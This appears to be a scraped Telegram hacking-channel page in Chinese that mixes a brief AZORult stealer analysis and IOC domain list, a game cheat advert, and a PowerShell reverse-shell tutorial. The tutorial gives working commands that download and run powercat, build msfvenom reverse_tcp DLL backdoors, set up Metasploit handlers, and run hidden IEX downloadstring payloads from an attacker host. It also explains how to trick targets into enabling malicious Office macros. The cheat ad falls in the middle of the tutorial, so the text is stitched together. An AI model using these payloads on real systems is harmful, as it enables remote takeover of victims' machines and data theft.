红客解密程序 暗网编程
27.6K subscribers
966 photos
12 videos
1 file
56 links
渗透测试,#删库,数据删除 拿数据库 木马注入 破解,提权,Dns动持
Download Telegram
样本分析 – 2.exe
2.exe为32位无壳PE文件,使用与1.exe中矿机相同的加载方法,将PE文件dump下分析为AZORult窃密木马,可以窃取受害者浏览器密码,paypal账号,比特币钱包等敏感信息,通过威胁情报关联,找到了一个木马打包的受害者信息,内含大量敏感信息
1
IOC信息
矿池地址及C&C

后给出感染情况统计服务器88.99.66.31在2018年的历史解析,

最可以据此排查

imap.yip.su                                   

mcm.iplogger.com

www.iplogger.co

api.iplogger.com

02ip.ru

enterpriseenrollment.iplogger.ru

iplogger.org

ezstat.ru

office.iplogger.com

blog.iplogger.org

corp.ezstat.ru

cdn-www.ezstat.ru

pub-my.iplogger.com

css.iplogger.ru

www.iplogger.ru

message.ezstat.ru

cdn-www.ezstat.ru

iplogger.co

yip.su

www.iplis.ru

www.iplogger.ru

devqa.iplogger.org

imap.iplogger.com

mail.ezstat.ru

docs.ezstat.ru

static.31.66.99.88.clients.your-server.de

superadmin.maper.info

2no.co

sentry.ezstat.ru

pages.ezstat.ru

m.iplogger.com

de.ezstat.ru

dwww.iplogger.org

iplogger.info

iplogger.blog

plus.ezstat.ru

promod.iplogger.org

api.ezstat.ru

yip.su

onelogin.ezstat.ru

mobile.iplogger.com

support02.maper.info

media2.iplogger.org

qa.ezstat.ru

dashboard.ezstat.ru

prx.ezstat.ru

ipgraber.ru

login.ezstat.ru

wldcrdrcrd.ezstat.ru

dr.iplogger.ru

iplo.ru

support02.maper.info

games.ezstat.ru

partners.ezstat.ru

alfa.maper.info

bes.ezstat.ru

qa.ezstat.ru

yip.su

blog.iplogger.org

jenkins.ezstat.ru

pma.deorg.ru

ease.iplogger.org

ftp.iplogger.com

devtest.iplogger.ru

antispam.iplogger.com

ease.iplogger.com

www.iplogger.org

www.ezstat.ru

apac.ezstat.ru

iplogger.info

awmdm.ezstat.ru

plus.ezstat.ru

pages.ezstat.ru

games.ezstat.ru

cs.ezstat.ru

beta.iplogger.ru

prd.iplogger.ru

aws.ezstat.ru

prix.iplogger.org

live.ezstat.ru

www.02ip.ru

mobicontrol.iplogger.com

vpc.ezstat.ru
powershell反弹shell常见方式

本文整理了通过powershell反弹shell的常见方式。利用powercat、dnscat2、nishang、Empire、PowerSploit、Metasploit、Cobalt strike、powershell自定义函数等方式反弹TCP/UDP/HTTP/HTTPS/ICMP/DNS等类型shell。
测试环境说明
攻击者:KALI2.0 32位 192.168.159.134
攻击者2:Ubuntu 14.04 LTS 192.168.159.129 (仅在dnscat2 反弹DNS shell中使用)
目标机:Windows Server 2008 X64 192.168.159.138

powercat反弹shell
powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat

攻击者(192.168.159.134)开启监听:
nc -lvp 6666
或者使用powercat监听
powercat -l -p 6666

目标机反弹cmd shell:

powershell IEX (New-Object System.Net.Webclient).DownloadString
('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 192.168.159.134 -p 6666 -e cmd
Reverse TCP shell
攻击者(192.168.159.134)开启监听:
nc -lvp 6666
利用office 宏反弹shell
攻击者(192.168.159.134)开启监听:
uselistener http
execute
back
usestager windows/macro http #生成payload
execute

生成/tmp/macro 攻击代码后,新建一个word 创建宏
点击“文件”-“宏”-“创建”,删除自带的脚本,复制进去/tmp/macro文件内容,并保存为“Word 97-2003文档(.doc)”或者“启用宏的Word 文档(.docm)”文件,当诱导目标打开,执行宏后,即可成功反弹shell:
说明:需要开启宏或者用户手动启用宏。开启宏设置:“文件”-“选项”-“信任中心”,选择“启用所有宏”
在word中“插入”-“对象”-“由文件创建” 处,插入launcher.bat文件,可更改文件名称和图标,进行伪装,当诱导目标点击launcher_lltest.xls文件,执行后,即可成功反弹shell
PowerSploit DLL注入反弹shell
PowerSploit是又一款基于powershell的后渗透攻击框架。PowerSploit包括Inject-Dll(注入dll到指定进程)、Inject-Shellcode(注入shellcode到执行进程)等功能。
利用msfvenom、metasploit和PowerSploit中的Invoke-DllInjection.ps1 实现dll注入,反弹shell

1)msfvenom生成dll后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.134 lport=6667 -f dll -o /var/www/html/PowerSploit/lltest.dll
说明:目标机64位 用x64 ; 32位的话用windows/meterpreter/reverse_tcp

metasploit 设置payload 开启监听

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.159.134
set LPORT 6667
exploit
metasploit反弹shell
利用metasploit的web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell

攻击者(192.168.159.134)
This media is not supported in your browser
VIEW IN TELEGRAM
逆战未来
无限子弹[单发枪打完了去补子弹就行]
5倍枪速[枪械射速以及换弹速度]
根目录777权限
大厅执行一次即可
游戏不退全局有效
下载地址:点击下载
#逆战未来 #山海经
目标机执行powershell payload:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.159.134:83/a'))"
6)成功反弹shell后,右键interact 进入shell